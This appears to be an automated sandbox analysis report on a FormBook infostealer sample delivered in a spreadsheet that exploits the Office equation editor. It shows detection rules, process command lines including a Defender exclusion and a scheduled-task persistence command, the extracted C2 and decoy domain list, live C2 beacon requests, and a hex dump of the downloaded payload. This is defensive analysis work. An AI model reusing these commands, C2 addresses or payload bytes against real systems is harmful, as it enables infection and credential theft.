9.0.vbc.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
9.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.vbc.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.vbc.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
9.0.vbc.exe.400000.9.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.9.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.9.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
9.2.vbc.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.vbc.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.vbc.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 18 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 107.173.229.133, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2828, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2828, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2608

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2828, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2224

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2608

Sigma detected: Suspicius Add Task From User AppData Temp

Show sources

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2224, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp, ProcessId: 2916

Sigma detected: Powershell Defender Exclusion

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2224, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe, ProcessId: 2776

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2224, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe, ProcessId: 2776

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2608

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.deboraverdian.com/ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: PROFORMA INVOICE.xlsx

ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY

Source: 9.0.vbc.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.vbc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.462674322.0000000000910000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.461677984.00000000007B0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.495648156.0000000000DC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000003.495116287.00000000002A0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.495983916.00000000004E0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.661157510.0000000000BA0000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: vbc.exe, 00000009.00000002.495309971.00000000006D9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.495142826.0000000000030000.00000040.00020000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 107.173.229.133:80

Source: global traffic

DNS query: name: www.noyoucantridemyonewheel.com

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx		9_2_00406ABE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop ebx		12_2_00086ABE

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 107.173.229.133:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.digipoint-entertainment.com
Source: C:\Windows\explorer.exe	Domain query: www.hacticum.com
Source: C:\Windows\explorer.exe	Network Connect: 108.167.189.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.trashwasher.com
Source: C:\Windows\explorer.exe	Domain query: www.noyoucantridemyonewheel.com
Source: C:\Windows\explorer.exe	Domain query: www.franquiciasexclusivas.tienda
Source: C:\Windows\explorer.exe	Network Connect: 151.106.119.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.deboraverdian.com
Source: C:\Windows\explorer.exe	Network Connect: 151.101.66.159 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.septemberstockevent200.com/ht08/

Source: global traffic	HTTP traffic detected: GET /ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.noyoucantridemyonewheel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.deboraverdian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.franquiciasexclusivas.tiendaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.hacticum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.trashwasher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:26:21 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 25 Nov 2021 07:58:32 GMTETag: "6c800-5d19857437223"Accept-Ranges: bytesContent-Length: 444416Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 42 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 be 06 00 00 08 00 00 00 00 00 00 36 dc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 db 06 00 4f 00 00 00 00 e0 06 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c bc 06 00 00 20 00 00 00 be 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 e0 06 00 00 06 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 07 00 00 02 00 00 00 c6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 dc 06 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 14 76 00 00 03 00 00 00 93 00 00 06 bc db 00 00 28 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 0

Source: global traffic

HTTP traffic detected: GET /90009/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.229.133Connection: Keep-Alive

Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: Joe Sandbox View	IP Address: 192.0.78.25 192.0.78.25
Source: Joe Sandbox View	IP Address: 151.101.66.159 151.101.66.159

Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: schtasks.exe, 00000007.00000002.457769626.0000000000830000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.476194780.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
